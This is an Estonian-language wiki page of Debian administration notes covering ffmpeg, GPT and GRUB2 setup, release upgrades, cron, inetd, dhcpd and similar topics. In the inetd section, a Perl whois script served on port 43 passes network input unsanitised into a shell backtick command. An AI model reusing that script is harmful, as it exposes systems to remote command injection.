$ ffmpeg -f x11grab -s 720x480 -r 23.976 -i :0.0 /tmp/file.mpg

QuickTime andmete teisendamine

$ ffmpeg -i video-in.mov -vcodec mpeg4 video-out.avi

QuickTime teisendamine Digital Video formaati

$ ffmpeg -i fail.mov -s pal -r pal -aspect 4:3 -ar 48000 -ac 2 fail.dv

Taasesitamine nö ressursisäästlikult

$ mplayer -vo xv -vfm ffmpeg -lavdopts lowres=1:fast:skiploopfilter=1 video-out.avi

Kasulikud lisamaterjalid

* http://viki.pingviin.org/MPlayer
* http://www.kinodv.org/

===Märkused===

* Selleks, et vaikimisi ei seataks pakettidele DF (don't fragment), sobib öelda

# sysctl -w net.ipv4.ip_no_pmtu_disc=1

* arvuti viimaseid reboote näitab käsk

# last reboot -f /var/log/wtmp.1
reboot system boot 3.16.0-4-amd64 Fri Aug 7 00:35 - 02:03 (38+01:27)
reboot system boot 3.16.0-4-amd64 Wed Aug 5 00:14 - 00:35 (2+00:20)
reboot system boot 3.16.0-4-amd64 Tue Aug 4 22:57 - 23:51 (00:53)
reboot system boot 3.16.0-4-amd64 Tue Aug 4 22:56 - 22:57 (00:01)

kus esimese rea teine kellaaeg on käesolev aeg (ja liigub), sulgudes on praktiliselt arvuti käesolev uptime; teiste ridade sulgudes on vastavad uptime ajad

* Failide-alamkataloogide-jms arv kataloogis

# for i in `ls -d /*` ; do echo -n "$i: "; find $i | wc -l; done

===PCMCIA seadmete kasutamine===

# apt-get install pcmciautils

===ExpressCard seadmete kasutamine===

Reeglina paistavad ExpressCard http://en.wikipedia.org/wiki/ExpressCard seadmed operatsioonisüsteemile USB seadmetena.

===syslog-ng kasutamine logiserverina===

syslog-ng http://www.balabit.com/network-security/syslog-ng/ sobib kasutada logiserveris ja tal on sellised omadused

* TODO

Debian Lenny sisaldab syslog-ng versioon 2.0, paigaldamiseks tuleb öelda

# apt-get install syslog-ng

Tarkvara tööd juhib seadistusfail /etc/syslog-ng/syslog-ng.conf

===Failisüsteem===

Debiani failisüsteemiga on seotud operatsioonisüsteemi seisukohalt sellised üldised asjaolud

* /proc ja /sys kataloogid on nö vaated töötavale linuxi tuumale

====Named ja unnamed pipe====

Pipe on FIFO ja selle instrumendi abil saavad programmid omavahel andmeid vahetada, nt named pipe puhul sobib ühes aknas öelda

$ mkfifo /tmp/fifonimi
$ cat < /tmp/fifonimi

ja teises aknas öelda

$ cal > /tmp/fifonimi

siis tulemusena esitatakse esimeses aknas cal käsu väljund.

Osutub, et pipe ei ole alati vajalik moodustada mkfifo käsu abil, sobib ka nii, sellisel juhul on tegu anonüümse pipe'iga

$ cal | cat

===Pidgin===

Pidgin (nö vana nimega Gaim) http://www.pidgin.im/ on mitmeid protokolle toetav instant messaging tarkvara. Kuna Debiani paketihalduse Pidgin tõrgub vahel, siis üks otsekohene alternatiiv on kasutada lähtetekstist kompileeritud Pidgini

# apt-get build-dep pidgin
$ ./configure --prefix=/opt/pidgin --disable-vv --disable-idn
$ make
$ make install

Pidgin v. 2.10.0, tundub, et kui kasutada süsteemis mozilla.debian.net tarkvara, siis ebaõnnestub sõltuvuste tõttu

# apt-get build-dep pidgin

Sellisel juhul tuleb käsitsi paigaldada

# apt-get install intltool libglib2.0-dev libgtk2.0-dev

$ ./configure --prefix=/opt/pidgin --disable-vv --disable-idn --disable-nm --disable-screensaver \
--disable-gtkspell --disable-gstreamer --disable-meanwhile --disable-avahi --disable-dbus --disable-tk
...

===lm-sensors===

lm-sensors http://www.lm-sensors.org/ tarkvara paigaldamiseks sobib öelda

# apt-get install lm-sensors

Esmalt tuleb teha kindlaks olemasolev riistvara ning laadida vastavad moodulid

# sensors-detect

Kasutamiseks öelda nt

# sensors -A | grep Core
Core 0: +47.0 C (high = +76.0 C, crit = +100.0 C)
Core 1: +51.0 C (high = +76.0 C, crit = +100.0 C)
Core 2: +41.0 C (high = +76.0 C, crit = +100.0 C)
Core 3: +41.0 C (high = +76.0 C, crit = +100.0 C)

kus

* Core N - protsessori tuuma temperatuur

===GPT kasutamine===

GPT (GUID Partition Table) http://en.wikipedia.org/wiki/GUID_Partition_Table on seotud järgmiste probleemide lahendamisega

* operatsioonisüsteemis soovitakse kasutada suuremat partitsiooni kui 2TB
* arvuti riistvara ei kasuta nn PC-BIOS'i vaid nt UEFI't (Unified Extensible Firmware Interface)
* kasutatakse 4096 B plokisuurusega kõvaketast
* saab kasutada kuni 128 nn primary partitsiooni

====GPT partitsioonide haldamine====

GPT partitsioonide haldamiseks sobib 2010 aasta suvel kasutada nt programme parted ja gdisk, esmalt tuleb moodustada plokkseadmele label öeldes

# parted /dev/sdc
(parted) mklabel gpt
Warning: The existing disk label on /dev/sdc will be destroyed and all data on this disk will be lost. Do you want to continue?
Yes/No? Yes

TODO

Kui kasutada fdisk programmi GPT partitsioonitabelit kasutava plokkseadmega, siis paistab tulemus selline

# fdisk -uc /dev/sda -l
WARNING: GPT (GUID Partition Table) detected on '/dev/sda'! The util fdisk doesn't support GPT. Use GNU Parted.
...
Device Boot Start End Blocks Id System
/dev/sda1 1 10485759 5242879+ ee GPT

====GRUB2 alglaaduri kasutamine GPT ja PC-BIOS riistvaraga====

Kui UEFI riistavara töötab GRUB2 alglaaduri ja GPT partitsioneeritud kõvakettaga nö otseselt, siis PC-BIOS arvuti puhul tuleb kasutada seejuures mõnda täiendavat võtet. Üldiselt toimub PC-BIOS riistvaral töötava süsteemi alglaadimine selliselt

* kõvakettale on moodustatud kolm GPT partitsiooni

(parted) p

Number Start End Size File system Name Flags
1 2048s 4095s 2048s biosboot bios_grub
2 4096s 1052671s 1048576s boot
3 1052672s 3905974271s 3904921600s system

* alglaadimisel loetakse üks alglaaduri aste esimeselt partitsioonilt
* järgmised astmed ning operatsioonisüsteemi tuum ja initramfs loetakse boot partitsioonilt
* operatsioonisüsteemi juurfailisüsteem asub kolmandal partitsioonil või sellel paiknevalt loogiliselt seadmelt, nt LVM köitelt

=====GPT partitsioonide moodustamine=====

(parted) unit s
(parted) mkpart biosboot 2048 4095
(parted) set 1 bios_grub on
(parted) mkpart boot 4096 1052671
(parted) mkpart system 1052672 3907026943
(parted) set 3 lvm on

kus

* tuleb jälgida, et partitsioonide suurused saavad sobivad, kaks esimest võiksid olla suhtliselt universaalselt sobivad

=====Failisüsteemide ettevalmistamine=====

GPT pealt töötava süsteemi saab ettevalmistada nt ühendades vastav plokkseade külge mõnele olemasolevale töötavale süsteemile. Seejärel moodustada seadmele GPT partitsioonitabel, failisüsteemid ning kopeerida sinna töötav süsteem üle, nt rsync abil.

=====GRUB2 seadistamine ja paigaldamine=====

GRUB2 seadistamiseks sobib kasutada nt sellist /etc/grub.d/40_custom faili

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries. Simply type the
# menu entries you want to add after this comment. Be careful not to change
# the 'exec tail' line above.

echo "Debian GPT" >&2
menuentry "Debian GPT" {
insmod part_gpt
insmod ext2
set root=(hd0,gpt2)
linux /vmlinuz-2.6.32-2-amd64 root=/dev/mapper/system-root ro
initrd /initrd.img-2.6.26-2-amd64
}

kus

* insmod part_gpt - grub2 laadib omale GTP partitsioonitabeli tundmise tarkuse
* (hd0,gpt2) - näitab millisel GPT partitsioonil asub /boot failisüsteem

Eeldusel, et failisüsteemid on monteeritud öelda

# grub-install --recheck --no-floppy --root-directory=/mnt/root /dev/sda
Installation finished. No error reported.

Tulemusena peaks arvuti käivituma.

====4096 B plokisuurusega kõvaketaste kasutamine====

2010 aasta suvel on 4k plokisuurusega kõvaketaste kasutamine pisut ebaselge, tundub, et üldiselt peaks utiliidid sellega automaatselt hiljem või varem hakkama saama. Hetkel näib ohutu nö käsitsi arvestada, et partitsiooni algus satuksid arvudega 8 ja 512 jaguvatele kohtadele, nt kasutades GPT partitsioonitabelit selliselt

(parted) unit s
(parted) mkpart system 2048 327679999
(parted) mkpart pgdata 327680000 164863999

kus

* unit s - edasi esitatakse partitsiooni algus ja lõpp sektori numbrina
* system - partitsiooni nimi kasutajale tähendust omaval kujul
* 2048 - partitsiooni algussektor
* 327679999 - partitsiooni lõpp sektor, arvestusega, et 327679999 + 1 jagub arvudega 8 ja 512

Paritsioonitüüpide näitamiseks öelda

(parted) set 1 lvm on
(parted) set 2 lvm on

Tulemuseks on

(parted) p
Model: ATA WDC WD2003FYYS-0 (scsi)
Disk /dev/sdc: 3907029168s
Sector size (logical/physical): 512B/512B
Partition Table: gpt

Number Start End Size File system Name Flags
1 2048s 327679999s 327677952s system lvm
2 327680000s 328703999s 1024000s pgdata lvm

Kui selliselt ettevalmistatud plokkseadmel kasutada failisüsteemi või nt mdadm, lvm või cryptsetup lahendusi, siis väidetavalt neile sobib 4k plokisuuris hästi.

====Kasulikud lisamaterjalid====

* http://www.ibm.com/developerworks/linux/library/l-4kb-sector-disks/
* http://www.johannes-bauer.com/linux/wdc/?menuid=3
* http://grub.enbug.org/BIOS_Boot_Partition
* http://wiki.archlinux.org/index.php/User:Skodabenz/GPT
* http://jamie.mayfirst.org/posts/2010/two-tb-disks/
* http://www.wensley.org.uk/gpt

===atftpd kasutamine===

atftpd on tftpd server ning atftp vastav klient.

====Server====

Serveri paigaldamiseks sobib öelda

# apt-get install atftpd

Seejuures küsitakse hulk küsimusi, vaikimisi käivitatakse paigaldamise lõpuks tftp teenus inetd superserverist ning kataloogiks on /srv/tftp.

Tööd juhitakse

* /etc/default/atftpd failis

USE_INETD=true

* /etc/inetd.conf failis sarnase reaga

tftp dgram udp4 wait nobody /usr/sbin/tcpd /usr/sbin/in.tftpd --tftpd-timeout 300 \
--retry-timeout 5 --no-multicast --maxthread 100 --verbose=5 --logfile /var/log/atftpd.log /srv/tftp

====Klient====

Kliendi paigaldamiseks sobib öelda

# apt-get install atftp

Kasutamiseks öelda nt

$ atftp 192.168.10.10
tftp> get /srv/tftp/sg200-18-20131217-mirror.conf

Tulemusena kopeeritakse fail kliendi käesolevasse kataloogi.

===strace programmi kasutamine===

Nö failisüsteemi tcpdump kasutamiseks sobib esmalt vaadata nt veebiseveri protsesside numbrid ja seejärel öelda

$ strace -p 19282 -p 19283 -p 19284 -p 19285 -p 19286 -p 19368 -p 20015 -p 29774 -p 29775 -f -e trace=open

kus

* -f - järgib forkisid
* -e määratleb, et jälgitakse failiavamisi

Märkused

* kui kasutada mitu korda -e parameetrit, siis kehtestub ainult viimane kasutamine
* kui kasutada -e järel mitut väärtust, nt '-e trace=read,write', siis väärtused OR-itakse kokku
* kui on soov jälgida konkreetse file descriptori kasutusi, siis tuleb strace väljundi teksti töödelda grep vms üldiste vahenditega
* shelli protsessi on huvitav strace'ida teisest aknast

Kasulikud lisamaterjalid

* http://myhowto.org/solving-problems/7-exploring-system-internals-with-lsof-and-strace/
* http://www.noah.org/wiki/Debugging_notes

===Debian Squeeze paigaldamine USB pulgalt===

Debian Squeeze operatsiooniüsteemi USB pulgalt paigaldamise eeldusteks on

* kasutada on olemasolev võrguühendusega Linux arvuti
* installeeritav arvuti boodib USB pulgalt
* installeeritava arvuti saab ühendada võrku

USB pulk tuleb Debian Squeeze paigaldamiseks ettevalmistada järgmiselt

* vastaku USB pulgale seade /dev/sdf, pulk peab olema monteerimata olekus, st öelda

# umount /dev/sdf

* lähtudes aadressilt http://www.debian.org/devel/debian-installer/ kopeerida sobivad boot.img.gz ning netinst.iso failid, nt

# http://ftp.nl.debian.org/debian/dists/testing/main/installer-amd64/current/images/hd-media/boot.img.gz
# http://cdimage.debian.org/cdimage/squeeze_di_rc1/amd64/iso-cd/debian-sq-di-rc1-amd64-netinst.iso

* kopeerida boot.img.gz pulgale öeldes

# zcat boot.img.gz > /dev/sdf

* monteerida pulk ning kopeerida netinst iso

# mkdir /mnt/sdf
# mount /dev/sdf /mnt/sdf
# cp debian-sq-di-rc1-amd64-netinst.iso /mnt/sdf

* ainult nn kommertsdraiveritega töötava riistvara kasutamiseks on vajalik lisaks kopeerida arhiiv firmware.tar.gz aadressilt http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/, nt

# wget http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/squeeze/current/firmware.tar.gz

ning pakkida lahti pulga juurikale kataloogi firmware

# mkdir /mnt/sdf/firmware
# tar -C /mnt/sdf/firmware -z -x -f firmware.tar.gz

Lõpuks tuleb pult lahti monteerida

# umount /mnt/sdf

Pulga kasutamiseks tuleb pult ühendada kõnealuse arvutiga, BIOS'ist seadistada käivituma USB pulgalt ning algab tarkvara paigaldus. Paigalduse käigus peaks olema kasutada internetiühendus.

===SSL juur-sertifikaatide lisamine===

Selleks, et süsteemi utiliidid, nt wget tunnustaksid veebiserveri sertifikaati peab olema vastav juur-sertifikaat ära kirjeldatud. Juur-sertifikaadi lisamiseks tuleb

* paigaldada pakett ca-certificates

# apt-get install ca-certificates

* kopeerida uus juur-sertifikaat kataloogi /usr/local/share/ca-certificates (failinimi peab lõppema .crt vastasel korral update-ca-certificates skript seda ei käsitle)

# cp Juur-LOOMAAED-cacert.pem /usr/local/share/ca-certificates/Juur-LOOMAAED.crt

* öelda

# update-ca-certificates

Tulemusena genereeritakse uued c_rehashid kataloogi /etc/ssl/certs

# ls -l /etc/ssl/certs/ | grep Juur
lrwxrwxrwx 1 root root 44 Feb 3 14:18 Juur-LOOMAAED.pem -> /usr/local/share/ca-certificates/Juur-LOOMAAED.crt
lrwxrwxrwx 1 root root 11 Feb 3 14:18 a376ee62.0 -> Juur-LOOMAAED.pem

ning lisatakse ta suurfaili /etc/ssl/certs/ca-certificates.crt.

===Debian v. 4 Etch -> v. 5 Lenny uuendamine===

Kui sources.list failis lenny kasutamise järel apt-get update ütleb vea

W: There is no public key available for the following key IDs:
4D270D06F42584E6
W: You may want to run apt-get update to correct these problems

siis aitab paigaldada debian-archive-keyring pakett

# apt-get install debian-archive-keyring

Kui kasutusel on uuemad bnx2 draiveriga käivad võrgukaardid, siis tuleb jälgida, et oleks paigaldatud pakett firmware-bnx2

# apt-get install firmware-bnx2

===Debian v. 5 Lenny -> v. 6 Squeeze uuendamine===

Ametlik operatsioonisüsteem Debian GNU/Linux Lenny -> Squeeze (v. 5.0 -> v. 6.0) juhend asub aadresil http://www.debian.org/releases/squeeze/amd64/release-notes/ch-upgrading.en.html

Uuendamise on oluline tähele panna järgmisi asjaolusid

* asutakse kasutama dash shelli nö süsteemse shellina, mh tähendab see, et /bin/sh -> bash asemel on

$ ls -l /bin/sh
lrwxrwxrwx 1 root root 4 Dec 26 2010 /bin/sh -> dash

* asuda uuendama süsteemi, millele on kõik Lenny uuendused rakendatud
* asendatakse legacy GRUB GRUB2 alglaaduriga, vajadusel anda pärast uuendust töötavas Squeeze süsteemis käsk upgrade-from-grub-legacy
* veenduda enne uuendamise protseduuri, et failisüsteemis on piisavalt vaba ruumi
* asutakse bootloaderis kasutama failisüsteemide plokkseadmetele vastavaid UUID väärtusi
* eemdalda paketihaldusest mitte paigaldatud tarkvara (nt VMWare Tools)
* eemaldada /etc/ alt nö käsitsi lisatud start-up skriptid, mis võivad segada automaatset süsteemi migreerimist kasutama insserv käivitusskripte

====Uuendamise protseduur====

* veenduda, et on olemas süsteemist varukoopia
* rakendada paketihaldusest uuendused vanale süsteemile
* teha seadistusfailidest koopia, et oleks mugav võrrelda

# cp -a /etc /root/etc-20110522-tootanud-lenny
# cp -a /boot /root/boot-20110522-tootanud-lenny

* eemaldada paketihaldusest mitte paigaldatud tarkvara, nt

# vmware-uninstall.pl

* kasutada /etc/apt/sources.list faili sisuga, uuendamise ajal on security välja kommenteeritud

deb http://ftp.ee.debian.org/debian/ squeeze main contrib non-free
deb-src http://ftp.ee.debian.org/debian/ squeeze main contrib non-free

# deb http://security.debian.org/ squeeze/updates main contrib non-free
# deb-src http://security.debian.org/ squeeze/updates main contrib non-free

ning öelda

# apt-get update
# apt-get dist-upgrade -d

* kasutada script'i esitatud küsimuste-vastuste-teadete salvestamiseks, mis töötab üldiselt nii

# script -t 2>~/kernel-udev-upgrade-squeezestep.time -a ~/kernel-udev-upgrade-squeezestep.script
Script started, file is /root/upgrade-squeezestep.script
# date
...
# Ctrl-D
Script done, file is /root/upgrade-squeezestep.script

script tööga kaasneb kaks protsessi

# ps aux | grep scr
root 4960 0.0 0.0 5848 572 pts/0 S+ 10:36 0:00 script -t -a /root/upgrade-squeezestep.script
root 4961 0.0 0.0 5852 460 pts/0 S+ 10:36 0:00 script -t -a /root/upgrade-squeezestep.script

* käivitada script abil salvestamine

# script -t 2>~/kernel-udev-upgrade-squeezestep.time -a ~/kernel-udev-upgrade-squeezestep.script

* uuendada tuum ja udev

# apt-get install linux-image-2.6-amd64

Seejuures pakutakse ja võiks aktsepteerida plokkseadmete UUID väärtuste kasutamist.

# apt-get install udev

* vajadusel paigaldada non-free firmware draiverid öeldes (nt bnx 10g seadme jaoks)

# apt-get install firmware-linux-nonfree

* veenduda, et /boot/grub/menu.lst algaadib uue tuumaga, /etc/fstab ühendab külge sobivad failisüsteemid ja alglaadida süsteem
* veenduda, et failisüsteemis on piisavalt ruumi, käivitada script ja paigaldada muud süsteemi uuendused

# script -t 2>~/dist-upgrade-squeezestep.time -a ~/dist-upgrade-squeezestep.script
# apt-get dist-upgrade

* dash shelli kasutamiseks öeldakse

The system shell is the default command interpreter for shell scripts.

Using dash as the system shell will improve the system's overall performance. It does not alter the shell
presented to interactive users. Use dash as the default system shell (/bin/sh)?

* dist-upgrade käigus üritatakse migreerida dependecy-based insserv käivitusskriptidele

The boot system is prepared to migrate to dependency-based sequencing. This is an irreversible step, but one that is recommended:
it allows the boot process to be optimized for speed and efficiency, and provides a more resilient framework for development.

A full rationale is detailed in /usr/share/doc/sysv-rc/README.Debian. If you choose not to migrate now, you can do so later by
running "dpkg-reconfigure sysv-rc".

Migrate legacy boot sequencing to dependency-based sequencing?

* Uuendamisel tuleb kasutaja poolt muudetud seadistusfailid lasta uute nn package maintainer versiooniga üle kirjutada ja pärast muudatused käsitsi kohendada, nimekirja muudetud failidest näeb nt nii

# grep "Configuration file" dist-upgrade-squeezestep.script
Configuration file `/etc/security/limits.conf'
Configuration file `/etc/nagios/nrpe.cfg'
Configuration file `/etc/sysctl.conf'
Configuration file `/etc/rsyslog.conf'
Configuration file `/etc/ssh/ssh_config'
Configuration file `/etc/apache2/apache2.conf'
Configuration file `/etc/apache2/ports.conf'
Configuration file `/etc/joe/joerc'
Configuration file `/etc/snmp/snmpd.conf'
Configuration file `/etc/default/snmpd'

kusjuures asendatud failst salvestatakse reeglina koopia nimele lisades lõppu .dpkg-old, nt

/etc/snmp/snmpd.conf.dpkg-old

st ülekirjutatud failid leiab nt nii

# find /etc/ -name \*-old

* vmware tools kompileerimise asemel on alternatiiv kasutada paketti open-vm-tools, kasutaja peab ise otsustama mida eelistada

# apt-get install open-vm-tools
...
Loading open-vm-tools modules: vmhgfsFATAL: Module vmhgfs not found.
vmmemctlFATAL: Module vmmemctl not found.
vmsyncFATAL: Module vmsync not found.

* vajadusel öelda

# dpkg-reconfigure sysv-rc

* vajadusel öelda (kui uuendatavas süsteemis mingil põhjusel oli alglaadur paigaldamata paketihaldusest)

# apt-get install grub-pc

* vajadusel öelda

# upgrade-from-grub-legacy

* kasutuses mitte olevate pakettide eemaldamine

# apt-get autoremove

* eemaldada /etc/apt/sources.list failid security eest kommentaarid ja rakendada uuendused
* kohendada käsitsi paketihaldusest uuendamise käigus vaikeväärtustega asendatud seadistusfailid

====Märkused====

* kui uuendamine peatub seetõttu, et mõne nö ebaolulise programmi käivitusskript ei tööta, siis sobib vastav pakett eemaldada, kui ka see ei õnnestu, siis võiks proovida käivitusskripti sisu asendada millegagi, mis formaalselt toimib, nt

# cat /etc/init.d/nagios3
#! /bin/sh
exit 0;

===Debian v. 6 Squeeze > v. 7 Wheezy uuendamine===

Ametlik operatsioonisüsteem Debian GNU/Linux Lenny -> Squeeze (v. 6.0 -> v. 7.0) juhend asub aadresil http://www.debian.org/releases/stable/amd64/release-notes/ch-upgrading.en.html

Debian v. 7 Wheezy GRUB2 versiooni on number selline

GNU GRUB version 1.99-27+deb7u1

Kui 2015 kevadel öelda

# apt-get update
Hit http://ftp.ee.debian.org wheezy Release.gpg
...
Reading package lists... Done
W: There is no public key available for the following key IDs:
7638D0442B90D010

siis aitab

# apt-get install debian-keyring debian-archive-keyring

===Debian v. 8 Jessie -> v. 9 Stretch uuendamine===

Operatsioonisüsteemi uuendus toimub nagu tavaliselt, kuid viimaks sobib öelda

# aptitude search ?obsolete
# aptitude purge ?obsolete

MySQL -> MariaDB uuendus toimub üldiselt automaatselt, aga sobib lõpus öelda (vt ligipääs failist /etc/mysql/debian.cnf)

# mysql_upgrade -h localhost -u debian-sys-maint -pparool

Kasulikud lisamaterjalid

* https://www.debian.org/releases/stretch/amd64/release-notes/ch-upgrading.en.html
* https://www.auul.pri.ee/wiki/MySQL_andmebaasi_kasutamine_operatsioonis%C3%BCsteemiga_Debian#Andmebaasi_uuendamine_MySQL_v._5.5_-.3E_MariaDB_v._10.1

===insserv käivitussüsteemi kasutamine===

Debian Squeeze v. 6.0 kasutab nn System-V-like käivitusskripte, kusjuures nende tööd saab seadistada insserv tarkvaraga

# cat /etc/init.d/nfsen
#!/bin/sh
set -e

### BEGIN INIT INFO
# Provides: nfsen
# Required-Start: $local_fs $remote_fs $network $time
# Required-Stop: $local_fs $remote_fs $network $time
# Should-Start: $syslog
# Should-Stop: $syslog
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: NfSen Server
### END INIT INFO

#!/bin/bash
case "$1" in
start)
echo "Starting NfSen server"
/srv/nfsen/bin/nfsen start
;;
stop)
echo "Stopping NfSen server"
/srv/nfsen/bin/nfsen stop
;;
*)
echo "Usage: /etc/init.d/nfsen {start|stop}"
exit 1
esac
exit 0

/etc/rc3.d jt rc kataloogide alla tekivad lingid öeldes

# insserv nfsen

Käivitusskriptile linkide eemaldamiseks sobib öelda

# insserv -r nfsen

Lisaks -n võtme lisamine ainult näitab, mis toimuks

# insserv -n -d nfsen

Required-Start: rea lõppu lisades nt 'postgresql' tulemusena käivitatakse kõnealune programm peale PostgreSQL andmebaasi.

Lisamaterjalid:

* http://wiki.debian.org/LSBInitScripts
* http://wiki.debian.org/LSBInitScripts/DependencyBasedBoot

===Dhcpd serveri kasutamine===

ISC DHCP tarkvara paigaldamiseks sobib öelda

# apt-get install dhcp3-server

DHCP serveri tööd juhib seadistusfail, nt

# cat /etc/dhcp/dhcpd.conf
ddns-update-style none;
default-lease-time 600;
max-lease-time 7200;
log-facility local7;

shared-network auul {
option domain-name "auul";
option domain-name-servers 10.192.0.53;

subnet 192.168.50.0 netmask 255.255.255.0 {
range 192.168.50.200 192.168.50.224;
option routers 192.168.50.10;
}
}

Lisaks näidatakse failis /etc/default/isc-dhcp-server millistel võrguseadmetel teenust pakutakse

# cat /etc/default/isc-dhcp-server
...
INTERFACES="eth1"

DHCP serveri käivitab skript

# /etc/init.d/isc-dhcp-server stop|start

===At tööd===

Töö tekitamiseks sobib öelda

$ echo "date >> /tmp/test.log" | at -t 201509250950

Tööde nimekirja esitamiseks

$ atq
10 Fri Sep 25 09:50:00 2015 a imre

Tehtud tööd eemaldatakse automaatselt, tuleviku tööde eemaldamiseks

$ atrm 10

Töö sisu esitamiseks

$ at -c 10

===Cron tööd===

Debiani cron töid juhivad sellised seadistusfailid

* /etc/crontab
* /etc/cron.d - kataloogis sisalduvaid faile käsitletakse cron kirjeldusfailidena, /etc/crontab formaadis (st sisaldub user väli)
* /etc/cron.daily
* /etc/cron.hourly
* /etc/cron.monthly
* /etc/cron.weekly
* /var/spool/cron/kasutajanimi

Kasulikud lisamaterjalid

* man cron

===Anacron===

Anacron http://anacron.sourceforge.net/ ...

===tcp wrapper teegi kasutamine===

Paljud Debiani programmid on kompileeritud vastu libwrap teeki, mis tähendab, et nende tööd saab kontrollida /etc/hosts.allow ja /etc/hosts.deny failidest. Nt nrpe deemoni puhul selleks, et lubada ligipääsu võrgust 172.18.20.0/24 sobib kasutada

# cat /etc/hosts.allow
nrpe: 172.18.20.0/24

# cat /etc/hosts.deny
nrpe: ALL

Seadistustes tehtud muudatused kehtestuvad kohe, midagi ei ole vaja reloadida ega restartida. Seda kas programm on kompileeritud vastu librwap teeki saab küsida

# ldd /usr/sbin/nrpe | grep libwrap
libwrap.so.0 => /lib/libwrap.so.0 (0x00007fd00518b000)

===dump ja restore kasutamine===

Dump faili moodustamiseks

# umount /mnt/lvmkoitenimi
# dump -0uf /tmp/failinimi.dump /dev/system/lvmkoitenimi
DUMP: Date of this level 0 dump: Tue Jul 12 23:45:46 2011
DUMP: Dumping /dev/system/lvmkoitenimi (an unlisted file system) to /tmp/failinimi.dump
DUMP: Label: none
DUMP: Writing 10 Kilobyte records
DUMP: mapping (Pass I) [regular files]
DUMP: mapping (Pass II) [directories]
DUMP: estimated 66671 blocks.
DUMP: Volume 1 started with block 1 at: Tue Jul 12 23:45:47 2011
DUMP: dumping (Pass III) [directories]
DUMP: dumping (Pass IV) [regular files]
DUMP: Closing /tmp/failinimi.dump
DUMP: Volume 1 completed at: Tue Jul 12 23:45:48 2011
DUMP: Volume 1 66500 blocks (64.94MB)
DUMP: Volume 1 took 0:00:01
DUMP: Volume 1 transfer rate: 66500 kB/s
DUMP: 66500 blocks (64.94MB) on 1 volume(s)
DUMP: finished in 1 seconds, throughput 66500 kBytes/sec
DUMP: Date of this level 0 dump: Tue Jul 12 23:45:46 2011
DUMP: Date this dump completed: Tue Jul 12 23:45:48 2011
DUMP: Average transfer rate: 66500 kB/s
DUMP: DUMP IS DONE

kus

* -0 - tekitada full dump
* -u - kirjutada tegevuse kohta jälg /var/lib/dumpdates faili
* -f - salvestada dump näidatud faili

Dump failist taastamiseks

# mount /dev/system/lvmkoitenimi_2 /mnt/lvmkoitenimi_2
# cd /mnt/lvmkoitenimi_2
# restore -rf /tmp/failinimi.dump

kus

* -r - taastada dumpis käesolevasse kataloogi, mis on kuhu on monteeritud tühi failisüsteem
* -f - kasutatav dump fail

===inetd===

Debian Squeeze paketihaldusest saab valida erinevaid inetd servereid, openbsd-inetd paigaldamiseks sobib öelda

# apt-get install openbsd-inetd

2011. aasta keskel v. 1.3.5 sisaldab libexec/Lookup.pm teeki, kuhu on sisse kirjutatud whois.cyberabuse.org serveri nimi, kuid see server ei paku enam sobival viisil teenust ning tulemuseks on, et NfSen liideses ei saa enam ip aadressidel teha päringuid. Üheks alternatiiviks on seadistada käima lokaalne whois teenus, nt ühendades 43/tcp port ja sellise Perli skripti sisend ja väljund kokku inetd abil

# cat /srv/data/nfsen/libexec/whois.pl
#!/usr/bin/perl
my $filename = <>;

foreach $rida($filename) {
$vastus=`/usr/bin/whois $rida`;
print $vastus;
last;
};

ning kasutades /etc/inetd.conf seadisusfailis rida

43 stream tcp nowait nobody /srv/data/nfsen/libexec/whois.pl whois.pl

whois päringute esitamise kontrollimiseks sobib öelda

$ whois -h 127.0.0.1 127.0.0.1
..
NetRange: 127.0.0.0 - 127.255.255.255
CIDR: 127.0.0.0/8
OriginAS:
NetName: SPECIAL-IPV4-LOOPBACK-IANA-RESERVED
NetHandle: NET-127-0-0-0-1
Parent:
NetType: IANA Special Use

Kasutaja peab ise otsustama, kas talle selline lahendus sobib.

Kasulikud lisamaterjalid

http://www.telecom.otago.ac.nz/tele301/student_html/inetd-tcpwrappers.html

===RPC portmapper===

Debain Squeeze paketihaldusest saab valida erinevaid RPC portmap lahendusi, portmap paigaldamiseks sobib öelda

# apt-get install portmap

Arvutis töötavate RPC teenuste nimekirja küsimiseks sobib öelda

# rpcinfo -p hostname

Tundub, et rpcbind toetab erinevalt portmap tarkvarast IPv6 protokolli.

===Netlink socket===

ip programm suhtleb tuumaga kasutades netlink socket'it, mis praktiliselt tähendab nt seda, et ip programmi saab kasutada chroot keskkonnast, kus pole /proc failisüsteemi külge monteeritud (erinevalt ifconfig programmist, mis kasutab /proc failisüsteemi).

Kasulikud lisamaterjalid

* http://en.wikipedia.org/wiki/Netlink
* http://www.linuxjournal.com/article/7356?page=0,0

===Process accounting===

Operatsioonisüsteemi Debian Squeeze vaikimisi tuum võimaldab koguda process accountiga andmeid. Seda sobib teha nt acct paketi tarkvara abil, paigaldamiseks sobib öelda

# apt-get install acct

Tulemusena paigaldatakse muu hulgas sellised failid

* /usr/bin/lastcomm
* /usr/bin/ac
* /usr/sbin/accton
* /usr/sbin/sa
* /usr/sbin/dump-utmp
* /usr/sbin/dump-acct
* /etc/cron.daily/acct
* /etc/init.d/acct
* /etc/default/acct
* /etc/cron.monthly/acct

Selleks, et arvutis töötavate protsesside kohta andmed kogunema hakkaksid, vaikimisi faili /var/log/account/pacct, tuleb öelda

# accton on | off

Kogutud andmete esitamine toimub selliselt

# dump-acct /var/log/account/pacct | tail -n 5
tail |v3| 0.00| 0.00| 0.00| 0| 0| 4088.00| 0.00| 19856 19253|Mon Sep 19 20:34:56 2011
cron |v3| 0.00| 0.00| 1.00| 0| 0| 18832.00| 0.00| 19857 1138|Mon Sep 19 20:35:01 2011
ssh |v3| 0.00| 1.00| 75.00| 0| 0| 43192.00| 0.00| 19860 19633|Mon Sep 19 20:35:06 2011
postgres |v3| 0.00| 0.00| 2.00| 109| 113| 94272.00| 0.00| 19863 1395|Mon Sep 19 20:35:09 2011
telnet |v3| 0.00| 0.00| 3.00| 1000| 1000| 22680.00| 0.00| 19870 19865|Mon Sep 19 20:35:19 2011

kus kuuendas tulbas on protsessi UID väärtus.

===Passwords and encryption keys (Seahorse)===

TODO

===Mälu kasutamine===

Arvuti mälu kasutamise kohta saab küsida selliselt

# free
total used free shared buffers cached
Mem: 509172 501192 7980 0 3784 200248
-/+ buffers/cache: 297160 212012
Swap: 1048568 92568 956000

kus

